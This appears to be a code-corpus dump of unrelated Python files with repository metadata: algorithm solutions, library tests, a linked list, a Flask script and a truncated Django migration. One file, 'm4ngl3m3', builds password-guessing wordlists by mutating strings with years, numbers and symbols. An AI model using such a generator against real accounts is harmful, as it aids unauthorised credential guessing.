| 2020-04-09T03:11:51
| 277,572,643
| 0
| 0
|
MIT
| 2020-07-06T14:59:57
| 2020-07-06T14:59:56
| null |
UTF-8
|
Python
| false
| false
| 685
|
py
|
# Given n pairs of parentheses, write a function that generates all valid
# (well-formed) combinations of parentheses.
#
# For example, given n = 3, the result is:
#
# [
#   "((()))",
#   "(()())",
#   "(())()",
#   "()(())",
#   "()()()"
# ]
from typing import List
class Solution:
    def generateParenthesis(self, n: int) -> List[str]:
ans = []
def backtrack(s='',left=0,right=0):
if len(s) == 2 * n:
ans.append(s)
return
if left < n:
backtrack(s+'(',left+1,right)
if right < left:
backtrack(s+')',left,right+1)
backtrack()
return ans
|
[
"mzm@mail.dlut.edu.cn"
] |
mzm@mail.dlut.edu.cn
|
309933581c5906d2db8e8db38c4eb5949f694987
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03157/s868052818.py
|
ec6805ad1b92df0a841e5a07b2af49a175993650
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,370
|
py
|
from collections import defaultdict
H, W = map(int, input().split())
S = [input() for _ in range(H)]
es = defaultdict(list)
# For each cell we only need to look right and down; the symmetric edge is
# added at the same time, so there is no need to also scan left and up.
for i in range(H):
for j in range(W):
if j < W-1 and S[i][j] != S[i][j+1]:
es[(i,j)].append((i,j+1))
es[(i,j+1)].append((i,j))
if i < H-1 and S[i][j] != S[i+1][j]:
es[(i,j)].append((i+1, j))
es[(i+1,j)].append((i, j))
checked = [[False for _ in range(W)] for _ in range(H)]
ans = 0
for i in range(H):
for j in range(W):
if checked[i][j] == True:
continue
cnt_b = 0
cnt_w = 0
if S[i][j] == "#":
cnt_b += 1
else:
cnt_w += 1
checked[i][j] = True
stack = es[(i,j)]
while stack:
new_stack = []
for p,q in stack:
if checked[p][q] == False:
checked[p][q] = True
if S[p][q] == "#":
cnt_b += 1
else:
cnt_w += 1
new_stack.extend(es[(p,q)])
if len(new_stack) == 0:
break
else:
stack = new_stack
ans += cnt_b * cnt_w
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
79db950c2f9450ff729d2ac03f6271965dd807cf
|
d5049c3b59b943a158389deaefe9c48970a43c6c
|
/Lab4/UI.py
|
e33e0458a9bc51d6e7bef9164a7954f72ed438a3
|
[] |
no_license
|
LauraDiosan-CS/lab04-gatsp-DiosDuck
|
18e013df30b1a8d0e182190c693cad7da47e68d1
|
647ae011fa5edf7ea4a4187b684f351b0482c328
|
refs/heads/master
| 2022-04-22T20:47:47.311060
| 2020-03-27T17:59:05
| 2020-03-27T17:59:05
| 250,198,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
from Service import Service
class UI():
def __init__(self):
self.__service=None
def main(self):
while 1:
try:
x = input()
if x == "0":
return
elif x == "1":
file=input()
self.__service=Service(file,1)
self.__service.prob1()
print("Functie terminata")
elif x == "2":
file=input()
self.__service=Service(file,2)
self.__service.prob1()
print("Functie terminata")
else:
print("Error")
except FileNotFoundError:
print("Fisierul nu exista")
|
[
"noreply@github.com"
] |
LauraDiosan-CS.noreply@github.com
|
eda7d59af2ae751d7b25d53cd82272fde7a20c7d
|
eb19175c18053e5d414b4f6442bdfd0f9f97e24d
|
/tests/contrib_django/test_converter.py
|
8c04699773df54369df8be04d36665643a5f9a55
|
[
"MIT"
] |
permissive
|
jhgg/graphene
|
6c4c5a64b7b0f39c8f6b32d17f62e1c31ca03825
|
67904e8329de3d69fec8c82ba8c3b4fe598afa8e
|
refs/heads/master
| 2020-12-25T21:23:22.556227
| 2015-10-15T19:56:40
| 2015-10-15T19:56:40
| 43,073,008
| 1
| 0
| null | 2015-09-24T14:47:19
| 2015-09-24T14:47:19
| null |
UTF-8
|
Python
| false
| false
| 3,521
|
py
|
from collections import namedtuple
from pytest import raises
import graphene
from graphene import relay
from graphene.contrib.django.converter import (
convert_django_field
)
from graphene.contrib.django.fields import (
ConnectionOrListField,
DjangoModelField
)
from django.db import models
from .models import Article, Reporter
def assert_conversion(django_field, graphene_field, *args):
field = django_field(*args, help_text='Custom Help Text')
graphene_type = convert_django_field(field)
assert isinstance(graphene_type, graphene_field)
assert graphene_type.description == 'Custom Help Text'
return graphene_type
def test_should_unknown_django_field_raise_exception():
with raises(Exception) as excinfo:
convert_django_field(None)
assert 'Don\'t know how to convert the Django field' in str(excinfo.value)
def test_should_date_convert_string():
assert_conversion(models.DateField, graphene.StringField)
def test_should_char_convert_string():
assert_conversion(models.CharField, graphene.StringField)
def test_should_text_convert_string():
assert_conversion(models.TextField, graphene.StringField)
def test_should_email_convert_string():
assert_conversion(models.EmailField, graphene.StringField)
def test_should_slug_convert_string():
assert_conversion(models.SlugField, graphene.StringField)
def test_should_url_convert_string():
assert_conversion(models.URLField, graphene.StringField)
def test_should_auto_convert_id():
assert_conversion(models.AutoField, graphene.IDField)
def test_should_positive_integer_convert_int():
assert_conversion(models.PositiveIntegerField, graphene.IntField)
def test_should_positive_small_convert_int():
assert_conversion(models.PositiveSmallIntegerField, graphene.IntField)
def test_should_small_integer_convert_int():
assert_conversion(models.SmallIntegerField, graphene.IntField)
def test_should_big_integer_convert_int():
assert_conversion(models.BigIntegerField, graphene.IntField)
def test_should_integer_convert_int():
assert_conversion(models.IntegerField, graphene.IntField)
def test_should_boolean_convert_boolean():
field = assert_conversion(models.BooleanField, graphene.BooleanField)
assert field.required is True
def test_should_nullboolean_convert_boolean():
field = assert_conversion(models.NullBooleanField, graphene.BooleanField)
assert field.required is False
def test_should_float_convert_float():
assert_conversion(models.FloatField, graphene.FloatField)
def test_should_manytomany_convert_connectionorlist():
graphene_type = convert_django_field(Reporter._meta.local_many_to_many[0])
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Reporter
def test_should_manytoone_convert_connectionorlist():
graphene_type = convert_django_field(Reporter.articles.related)
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Article
def test_should_onetoone_convert_model():
field = assert_conversion(models.OneToOneField, DjangoModelField, Article)
assert field.model == Article
def test_should_foreignkey_convert_model():
field = assert_conversion(models.ForeignKey, DjangoModelField, Article)
assert field.model == Article
|
[
"me@syrusakbary.com"
] |
me@syrusakbary.com
|
2f961ffd53ac5c591c95cfb96f730b5bb45915e4
|
133e8c9df1d1725d7d34ea4317ae3a15e26e6c66
|
/python/数据结构与算法/02链表/单链表.py
|
9acd2da0cfb6f8e8a747ab11e1d4d6a83f289443
|
[
"Apache-2.0"
] |
permissive
|
425776024/Learn
|
dfa8b53233f019b77b7537cc340fce2a81ff4c3b
|
3990e75b469225ba7b430539ef9a16abe89eb863
|
refs/heads/master
| 2022-12-01T06:46:49.674609
| 2020-06-01T08:17:08
| 2020-06-01T08:17:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,886
|
py
|
# -*- coding: utf-8 -*-
class Node(object):
    def __init__(self, value=None, next=None):
        # The root node defaults to None, hence both default arguments.
        self.value = value  # data field
        self.next = next    # link field (pointer to the next node)
    def __str__(self):
        """Readable form for debugging; complex code may need a debugger."""
        return '<Node: value: {}, next={}>'.format(
            self.value, self.next.value if self.next else None)
    __repr__ = __str__
class LinkedList(object):
    '''A singly linked list.'''
    def __init__(self):
        '''Initialize an empty list: head and tail both start as None.'''
        self.head = None
        self.tail = None
    def append(self, data):
        '''
        Append an element to the list:
        1. If the list is empty, point both head and tail at the new node.
        2. Otherwise link the current tail's next to the new node.
        3. Move tail to the newly appended node.
        '''
        node = Node(data)
        if self.head is None:
            self.head = node
            self.tail = node
        else:
            self.tail.next = node
            self.tail = node
    def insert(self, index, value):
        '''Insert a node into the list.
        1. Walk from the head until reaching the node just before the
           requested index position.
        2. Wrap the value in a Node and point its next at the element that
           currently occupies the index.
        3. Point the previous node's next at the new node.
        '''
        cur = self.head
        node = Node(value)
        if index == 0:
            node.next = self.head
            if self.head is None:
                self.tail = node
            self.head = node
            return
        cur_index = 0
        while cur_index < index - 1:
            cur = cur.next
            if cur.next is None:
                raise Exception('list length less than index')
            cur_index += 1
        node.next = cur.next
        cur.next = node
        if node.next is None:  # inserted at the tail: move the tail pointer
            self.tail = node
    def remove(self, index):
        '''Remove the node at the given index.
        1. Walk to the node just before the requested index.
        2. Link that node's next pointer past the removed node.
        '''
        if index == 0:
            self.head = self.head.next
            if self.head is None:
                self.tail = None
            return
        cur = self.head
        cur_index = 0
        while cur_index < index - 1:
            cur = cur.next
            if cur is None:
                raise Exception('list length less than index')
            cur_index += 1
        cur.next = cur.next.next
        if cur.next is None:
            self.tail = cur
    def removeEle(self, value):
        """Remove the first node whose value equals ``value``.
        Returns True if a node was removed, False otherwise.
        """
        cur = self.head
        head = None  # trailing pointer: the node just before ``cur``
        while cur is not None:
if cur.value == value:
if cur is self.head:
_head = cur.next
self.head = _head
if _head is self.tail:
self.tail = _head
del cur
return True
if cur is self.tail:
head.next = None
self.tail = head
del cur
return True
head.next = cur.next
del cur
return True
head = cur
cur = cur.next
return False
    def iter(self):
        '''
        Return a generator over the list's values.
        1. If the list is empty, return immediately.
        2. Otherwise start from the head, yield its value, then keep
           following next pointers and yielding each value up to the tail.
        '''
if not self.head:
return
cur = self.head
yield cur.value
while cur.next:
cur = cur.next
yield cur.value
def __iter__(self):
for i in self.iter():
yield i
if __name__ == "__main__":
    linked_list = LinkedList()
    # Append elements in a loop.
    for i in range(10):
        linked_list.append(i)
    # Insert an element.
    linked_list.insert(0, 40)
    # Remove an element by index, then one by value.
    linked_list.remove(4)
    linked_list.removeEle(6)
    # Iterate over the list.
    # for node in linked_list.iter():
    #     print(node)
    # Iterate over the list.
    for node in linked_list:
        print(node)
|
[
"1248644045@qq.com"
] |
1248644045@qq.com
|
719ec5e11dce6e24bd6b5f91b3469b407c0160a1
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02257/s888628284.py
|
59550bf214754874e7673f5cf26d7edf5cc0ca07
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 321
|
py
|
# -*- coding: utf-8 -*-
def isPrime(p):
    # Fermat primality check with base 2: fast, but it accepts base-2
    # pseudoprimes (e.g. 341), so it is probabilistic rather than exact.
if p == 2:
return True
elif p < 2 or p%2 == 0:
return False
elif pow(2, p-1, p) == 1:
return True
else:
return False
n = int(raw_input())
count = 0
for i in range(n):
if isPrime(int(raw_input())):
count += 1
print count
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
ed222c561a8364dd729c7da79f866fc6f3032907
|
8419f7d24df69a2cb92f04d7369c11c8141b0fcd
|
/tests/selection_test.py
|
50d2e7a9e5f36e1495360ba5839de57cc89d17e9
|
[
"MIT"
] |
permissive
|
heyuqi1970/vaex
|
c1768eac9d5126e7efd1e139522feb9d65a7ecc9
|
867c180427a23e3b71df47305d7e8866b6673a98
|
refs/heads/master
| 2021-07-09T08:45:21.634354
| 2020-04-23T17:23:58
| 2020-04-23T17:23:58
| 242,555,084
| 2
| 0
|
MIT
| 2020-04-24T03:40:17
| 2020-02-23T16:54:13
|
Python
|
UTF-8
|
Python
| false
| false
| 6,325
|
py
|
from common import *
def test_selection_basics(df):
total = df["x"].sum()
df.select("x > 5")
df.select("x <= 5", name="inverse")
counts = df.count("x", selection=["default", "inverse", "x > 5", "default | inverse"])
np.testing.assert_array_almost_equal(counts, [4, 6, 4, 10])
df.select("x <= 1", name="inverse", mode="subtract")
counts = df.count("x", selection=["default", "inverse"])
np.testing.assert_array_almost_equal(counts, [4, 4])
total_subset = df["x"].sum(selection=True)
assert total_subset < total
for mode in vaex.selections._select_functions.keys():
df.select("x > 5")
df.select("x > 5", mode)
df.select(None)
df.select("x > 5", mode)
df.select("x > 5")
total_subset = df["x"].sum(selection=True)
df.select_inverse()
total_subset_inverse = df["x"].sum(selection=True)
df.select("x <= 5")
total_subset_inverse_compare = df["x"].sum(selection=True)
assert total_subset_inverse == total_subset_inverse_compare
assert total_subset_inverse + total_subset == total
df.select("x > 5")
df.select("x <= 5", name="inverse")
df.select_inverse(name="inverse")
counts = df.count("x", selection=["default", "inverse"])
np.testing.assert_array_almost_equal(counts, [4, 4])
def test_selection_history(df):
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
df.select_nothing()
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
total = df["x"].sum()
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
df.select("x > 5")
assert df.has_selection()
total_subset = df["x"].sum(selection=True)
assert total_subset < total
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.select("x < 7", mode="and")
total_subset2 = df["x"].sum(selection=True)
assert total_subset2 < total_subset
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
total_subset_same = df["x"].sum(selection=True)
    assert total_subset == total_subset_same
assert df.selection_can_undo()
assert df.selection_can_redo()
df.selection_redo()
total_subset2_same = df["x"].sum(selection=True)
    assert total_subset2 == total_subset2_same
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
df.selection_undo()
assert not df.has_selection()
assert not df.selection_can_undo()
assert df.selection_can_redo()
df.selection_redo()
assert df.has_selection()
assert df.selection_can_undo()
assert df.selection_can_redo()
df.select("x < 7", mode="and")
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.select_nothing()
assert not df.has_selection()
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
assert df.selection_can_undo()
assert df.selection_can_redo()
def test_selection_serialize(df):
selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
df.set_selection(selection_expression)
total_subset = df["x"].sum(selection=True)
df.select("x > 5")
total_subset_same = df["x"].sum(selection=True)
assert total_subset == total_subset_same
values = selection_expression.to_dict()
df.set_selection(vaex.selections.selection_from_dict(values))
total_subset_same2 = df["x"].sum(selection=True)
assert total_subset == total_subset_same2
selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
selection_lasso = vaex.selections.SelectionLasso("x", "y", [0, 10, 10, 0], [-1, -1, 100, 100], selection_expression, "and")
df.set_selection(selection_lasso)
total_2 = df.sum("x", selection=True)
assert total_2 == total_subset
def test_selection_and_filter():
x = np.arange(-10, 11, 1)
y = np.arange(21)
df = vaex.from_arrays(x=x, y=y)
df.select(df.x < 0)
selected_list = df.evaluate(df.x, selection=True).tolist()
df_filtered = df[df.x < 0]
filtered_list = df_filtered['x'].tolist()
assert filtered_list == selected_list
repr(df_filtered)
# make sure we can slice, and repr
df_sliced = df_filtered[:5]
repr(df_sliced)
def test_filter(df):
dff = df[df.x>4]
assert dff.x.tolist() == list(range(5,10))
# vaex can have filters 'grow'
dff_bigger = dff.filter(dff.x < 3, mode="or")
dff_bigger = dff_bigger.filter(dff_bigger.x >= 0, mode="and") # restore old filter (df_filtered)
assert dff_bigger.x.tolist() == list(range(3)) + list(range(5,10))
def test_filter_boolean_scalar_variable(df):
df = df[df.x>4]
assert df.x.tolist() == list(range(5,10))
df.add_variable("production", True)
df = df.filter("production", mode="or")
df = df[df.x>=0] # restore old filter (df_filtered)
df = df[df.x<10] # restore old filter (df_filtered)
assert df.x.tolist() == list(range(10))
def test_selection_with_filtered_df_invalid_data():
# Custom function to be applied to a filtered DataFrame
def custom_func(x):
assert 4 not in x; return x**2
df = vaex.from_arrays(x=np.arange(10))
df_filtered = df[df.x!=4]
df_filtered.add_function('custom_function', custom_func)
df_filtered['y'] = df_filtered.func.custom_function(df_filtered.x)
# assert df_filtered.y.tolist() == [0, 1, 4, 9, 25, 36, 49, 64, 81]
assert df_filtered.count(df_filtered.y, selection='y > 0') == 8
def test_lasso(df):
x = [-0.1, 5.1, 5.1, -0.1]
y = [-0.1, -0.1, 4.1, 4.1]
df.select_lasso("x", "y", x, y)
sumx, sumy = df.sum(["x", "y"], selection=True)
np.testing.assert_array_almost_equal(sumx, 0+1+2)
np.testing.assert_array_almost_equal(sumy, 0+1+4)
# now test with masked arrays, m ~= x
x = [8-0.1, 9+0.1, 9+0.1, 8-0.1]
y = [-0.1, -0.1, 1000, 1000]
if df.is_local():
df._invalidate_selection_cache()
df.select_lasso("m", "y", x, y)
sumx, sumy = df.sum(['m', 'y'], selection=True)
np.testing.assert_array_almost_equal(sumx, 8)
np.testing.assert_array_almost_equal(sumy, 8**2)
|
[
"maartenbreddels@gmail.com"
] |
maartenbreddels@gmail.com
|
5c187cef52ac8e1006273cd22ea80940f0c1b7d1
|
485ba262357e10460c74482cd407003ac86886bb
|
/pyNastran/converters/openfoam/test_openfoam_gui.py
|
0d93a5f9986ab459a658b741ae5694fddee65246
|
[] |
no_license
|
shangke00GitHub/pyNastran
|
13202f3f504dca044755088971176a407622425b
|
c4509df6ef6c3291c005caada831b443feee734f
|
refs/heads/master
| 2020-11-30T02:45:48.774507
| 2019-12-20T00:56:25
| 2019-12-20T00:56:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,090
|
py
|
import os
import unittest
from cpylog import get_logger
import pyNastran
from pyNastran.gui.testing_methods import FakeGUIMethods
from pyNastran.converters.openfoam.block_mesh import read_block_mesh, mirror_block_mesh
from pyNastran.converters.openfoam.face_file import FaceFile
from pyNastran.converters.openfoam.openfoam_io import OpenFoamIO
from pyNastran.utils import check_path
PKG_PATH = pyNastran.__path__[0]
MODEL_PATH = os.path.join(PKG_PATH, 'converters', 'openfoam', 'models')
class OpenFoamGUI(OpenFoamIO, FakeGUIMethods):
def __init__(self):
FakeGUIMethods.__init__(self)
self.model = OpenFoamIO(self)
self.build_fmts(['openfoam_hex', 'openfoam_shell', 'openfoam_faces'], stop_on_failure=True)
class TestOpenFoamGUI(unittest.TestCase):
def test_openfoam_geometry_01(self):
"""tests the ascii three plugs model"""
log = get_logger(level='warning', encoding='utf-8')
geometry_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict')
bdf_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict.bdf')
face_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'faces')
check_path(geometry_filename, 'geometry_filename')
test = OpenFoamGUI()
test.log = log
test.on_load_geometry(geometry_filename, geometry_format='openfoam_shell', raise_error=True)
test.on_load_geometry(geometry_filename, geometry_format='openfoam_hex', raise_error=True)
os.remove('points.bdf')
#test.load_openfoam_geometry_faces(geometry_filename)
model = read_block_mesh(geometry_filename, log=log)
block_mesh_name_out = 'blockMeshDict.out'
model.write_block_mesh(
block_mesh_name_out=block_mesh_name_out, make_symmetry=False)
model.write_block_mesh(
block_mesh_name_out=block_mesh_name_out, make_symmetry=True)
model.write_bdf(bdf_filename, model.nodes, model.hexas)
mirror_block_mesh(geometry_filename, block_mesh_name_out)
os.remove(block_mesh_name_out)
#nodes, hexas, quads, inames, bcs
def test_openfoam_2(self):
point_filename = 'points'
with open(point_filename, 'w') as point_file:
point_file.write('0. 0. 0.\n')
face_filename = 'faces'
with open(face_filename, 'w') as face_file:
face_file.write('2\n')
face_file.write('\n')
face_file.write('3 1 2 3\n')
face_file.write('3 1 3 4\n')
log = get_logger(level='warning', encoding='utf-8')
#test = OpenFoamGUI()
#test.log = log
#test.load_openfoam_faces_geometry(face_filename)
faces = FaceFile(log=None, debug=False)
faces.read_face_file(face_filename)
faces.read_face_file(face_filename, ifaces_to_read=[1])
faces.read_face_file(face_filename, ifaces_to_read=[0, 1])
os.remove(point_filename)
os.remove(face_filename)
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
[
"mesheb82@gmail.com"
] |
mesheb82@gmail.com
|
1df490347f6ba150e4c18eda8adb09b65cfd0cbd
|
7ca50753ed3ff4c6115f8be3de675c91631c382f
|
/manage.py
|
8c8509f5ee95dfc01cb27aa14ab0dd2c753db751
|
[] |
no_license
|
harrywang/flask-tdd-docker
|
a63ca86062dc05ab99591ef4ce609d90868f6e77
|
2677c52ae8dba84695d032fd309ee864f7fb2521
|
refs/heads/master
| 2023-05-11T15:44:04.689565
| 2020-03-21T20:00:57
| 2020-03-21T20:00:57
| 248,801,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 565
|
py
|
# manage.py
import sys
from flask.cli import FlaskGroup
from project import create_app, db
from project.api.users.models import User
app = create_app()
cli = FlaskGroup(create_app=create_app)
@cli.command('recreate_db')
def recreate_db():
db.drop_all()
db.create_all()
db.session.commit()
@cli.command('seed_db')
def seed_db():
db.session.add(User(username='michael', email="hermanmu@gmail.com"))
db.session.add(User(username='michaelherman', email="michael@mherman.org"))
db.session.commit()
if __name__ == '__main__':
cli()
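# Example invocations of the commands registered above (assumed to be run
# from the project root):
#   python manage.py recreate_db
#   python manage.py seed_db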
|
[
"harryjwang@gmail.com"
] |
harryjwang@gmail.com
|
561a473b6aa704f7d0651d89278fc1942b376384
|
b3528a3795ce373e27d52362128de3cff6f9969d
|
/python/orbs/target/password-generator/slices1589360571.263371/success/success_39_0.py
|
f1896f56cc09413b60c95ec2ce3c24bce6dab1fd
|
[] |
no_license
|
greenmonn/daily-coding
|
43e0f3775678c7d6116df7ba5034ea18489d87c9
|
ef6ecc88e6db61e18364eef3ea071c11e1385a99
|
refs/heads/master
| 2023-01-14T04:59:14.130309
| 2021-02-08T23:32:56
| 2021-02-08T23:32:56
| 157,735,438
| 1
| 1
| null | 2022-12-21T02:13:17
| 2018-11-15T15:47:37
|
Python
|
UTF-8
|
Python
| false
| false
| 5,253
|
py
|
#!/usr/bin/env python3
# m4ngl3m3! v0.1.1
# Common password pattern generator using strings list
# Follow (Medium / Twitter): @localh0t
import argparse
import sys
import os
from Mangler import ManglingParameters
from Mangler import Mangler
def build_parser():
"""Add parser arguments and return an instance of ArgumentParser."""
parser = argparse.ArgumentParser(description=("Common password pattern "
"generator using strings "
"list"),
formatter_class=argparse.
ArgumentDefaultsHelpFormatter)
parser.add_argument("mutation_mode",
metavar="MUTATION_MODE",
type=str,
help=("Mutation mode to perform: "
"(prefix-mode | suffix-mode | dual-mode)"),
choices=['prefix-mode', 'suffix-mode', 'dual-mode'])
parser.add_argument("strings_file",
metavar="STRINGS_FILE",
type=str,
help="File with strings to mutate")
parser.add_argument("output_file",
metavar="OUTPUT_FILE",
type=str,
help="Where to write the mutated strings")
parser.add_argument("-fy", "--from-year",
metavar="FROM_YEAR",
type=int,
help="Year where our iteration starts",
default=2015)
parser.add_argument("-ty", "--to-year",
metavar="TO_YEAR",
type=int,
help="Year where our iteration ends",
default=2020)
parser.add_argument('-sy', "--short-year",
help=("Also add shorter year form when iterating"),
action='store_true',
default=False)
parser.add_argument("-nf", "--numbers-file",
metavar="NUMBERS_FILE",
type=str,
help="Numbers prefix/suffix file",
default='./target/password-generator/files/numbers/numbers_set2.txt')
parser.add_argument("-sf", "--symbols-file",
metavar="SYMBOLS_FILE",
type=str,
help="Symbols prefix/suffix file",
default='./target/password-generator/files/symbols/symbols_set2.txt')
parser.add_argument("-cf", "--custom-file",
metavar="CUSTOM_FILE",
type=str,
help="Custom words/dates/initials/etc file")
parser.add_argument('-sbs', "--symbols-before-suffix",
help=("Insert symbols also before years/numbers/"
"custom (when in suffix-mode or dual-mode)"),
action='store_true',
default=False)
parser.add_argument('-sap', "--symbols-after-prefix",
help=("Insert symbols also after years/numbers/custom"
" (when in prefix-mode or dual-mode)"),
action='store_true',
default=False)
parser.add_argument("-mm", "--mutation-methods",
metavar="MUTATION_METHODS",
default='normal,'
'uppercase,'
'firstup,'
'replacevowels')
return parser
def build_mangler_with_args(args):
parameters = ManglingParameters()
parameters.num_file = open(args.numbers_file, 'r').read().splitlines()
parameters.sym_file = open(args.symbols_file, 'r').read().splitlines()
if (args.custom_file):
parameters.cus_file = open(args.custom_file, 'r').read().splitlines()
parameters.mutation_mode = args.mutation_mode
parameters.from_year = args.from_year
parameters.to_year = args.to_year
parameters.suffix_pos_swap = args.symbols_before_suffix
return Mangler(mangling_parameters=parameters)
if __name__ == "__main__":
args = build_parser().parse_args()
mangler = build_mangler_with_args(args)
mangler_functions = {
"normal": mangler.normal_mangling,
"uppercase": mangler.uppercase_mangling,
"firstup": mangler.firstup_mangling,
"replacevowels": mangler.replacevowels_mangling,
}
written_strings = 0
with open(args.strings_file, 'r') as f:
for line in f:
mangled = []
for method in args.mutation_methods.lower().split(","):
try:
(name, output) = mangler_functions[method](line.strip())
mangled.extend(output)
except KeyError:
print("[-] The method %s is not defined !" % method)
print("[+] %s mutation method done on string: %s" %
(name, line.strip()))
written_strings += len(mangled)
print('##v_trajectory captured: {}##'.format(written_strings))
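# Example invocation (the script and file names here are illustrative, not
# taken from the original project):
#   python3 mangler.py suffix-mode strings.txt mutated.txt -fy 2018 -ty 2021 -sy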
|
[
"greenmon@kaist.ac.kr"
] |
greenmon@kaist.ac.kr
|
e382659fe44a65b3a060e2c0d9cb78015fd0bea2
|
28436c3e8d5f59f9011bfac7fcdef977c345aa7b
|
/2021-05-15/homework1.py
|
960425e000fa70c2621ff185c6e2e587beb46b6b
|
[] |
no_license
|
engeeker/python-for-kid-2021
|
533d7b54ef23d99727642ba7a119e0a46577651b
|
783d3582c6e9009c23213378650160f7dc937409
|
refs/heads/main
| 2023-08-02T15:18:17.367567
| 2021-10-01T13:15:56
| 2021-10-01T13:15:56
| 347,414,400
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
import turtle
import random
p = turtle.Pen()
color_list = ['red', 'yellow', 'blue', 'green']
p.speed(0)
turtle.bgcolor('black')
p.color(random.choice(color_list))
for i in range(200):
p.forward(i * 2)
p.left(91)
turtle.Screen().exitonclick()
|
[
"xiaoquwl@gmail.com"
] |
xiaoquwl@gmail.com
|
804b7d2aeaf690de61b0b87bbb40796c12287a2a
|
dfaf5cd5607c2c4e55ec9173d2d7ca12842db129
|
/104_findDiagonalOrder.py
|
add0e471b6091ea711a6ab960ca377f92f09bd77
|
[] |
no_license
|
khinthandarkyaw98/Leetcode
|
2b0be053931b3ddec6309d136228dae1f4c61b2b
|
578f2a38d8a41864ebfd6c4e941f6915c7c0a508
|
refs/heads/master
| 2023-06-24T02:34:59.399319
| 2021-07-14T19:37:14
| 2021-07-14T19:37:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 488
|
py
|
import collections
class Solution:
def findDiagonalOrder(self, nums: List[List[int]]) -> List[int]:
res = []
q = collections.deque()
q.append((0,0))
while q:
row, col = q.popleft()
if col == 0 and row < len(nums)-1:
q.append((row + 1, col))
if col< len(nums[row])-1:
q.append((row, col+1))
res.append(nums[row][col])
return res
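# Quick sanity check (hypothetical local harness; List comes from typing):
# the queue walks each anti-diagonal from its bottom-left cell upward.
print(Solution().findDiagonalOrder([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))
# -> [1, 4, 2, 7, 5, 3, 8, 6, 9]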
|
[
"noreply@github.com"
] |
khinthandarkyaw98.noreply@github.com
|
be4a4e2c0ee32b41a05520c16e30dac4c1106efe
|
922e923bdab099efa7161f5806ed262ba5cc84c4
|
/apps/documents/migrations/0006_boardmeetingaudio_boardmeetingvideo.py
|
22c1e2091ad36ddb3047bb2b82dd82b211ce2165
|
[
"MIT"
] |
permissive
|
iamjdcollins/districtwebsite
|
eadd45a7bf49a43e6497f68a361329f93c41f117
|
89e2aea47ca3d221665bc23586a4374421be5800
|
refs/heads/master
| 2021-07-05T19:06:12.458608
| 2019-02-20T17:10:10
| 2019-02-20T17:10:10
| 109,855,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,722
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-11 17:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('objects', '0005_auto_20171210_1447'),
('documents', '0005_boardmeetingagenda_boardmeetingminutes'),
]
operations = [
migrations.CreateModel(
name='BoardMeetingAudio',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingaudio_document_node', models.OneToOneField(db_column='boardmeetingaudio_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingaudio_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingaudio', 'Can soft delete board meeting audio'), ('restore_boardmeetingaudio', 'Can restore board meeting audio')),
'verbose_name_plural': 'Board Meeting Audio',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingaudio',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Audio',
},
bases=('objects.document',),
),
migrations.CreateModel(
name='BoardMeetingVideo',
fields=[
('title', models.CharField(max_length=200)),
